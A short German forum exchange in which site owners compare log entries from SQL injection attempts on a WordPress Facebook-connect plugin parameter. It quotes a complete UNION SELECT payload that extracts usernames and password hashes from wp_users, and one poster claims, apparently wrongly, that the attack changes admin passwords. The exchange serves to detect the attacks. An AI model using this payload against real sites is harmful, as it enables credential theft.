Die Angriffe bei mir waren am letzten Wochenende über eine SQL Injection Attack. Meine Firewall logte die SQL Injection
Auszug.
de/?fbconnect_action=myhome&fbuserid=2+and+1=2+union+select+1,2,3,4,5,concat%28use ... uswEinfach mal prüfen, ob du derartige Sachen in der Log findest. Hier werden die Passwörter der Admins mit der id 1 bis 5 geändert.
Viel Glück
Ralf
Danke für den Tipp. Tatsächlich findet sich auch in meinen Logs ähnliches:
Code
- - [26/Oct/2013:05:28:23 +0200] "GET /?fbconnect_action=myhome&fbuserid=2+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x7e,user_pass%29a,7,8,9,10,11,12+from+wp_users--/?fbconnect_action=myhome&fbuserid=2+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x7e,user_pass%29a,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 403 271 "-" "Mozilla/3.0 (compatible; Indy Library)"
IP stammt von den Philippinen.
Wurden bei dir Einträge in der DB geändert?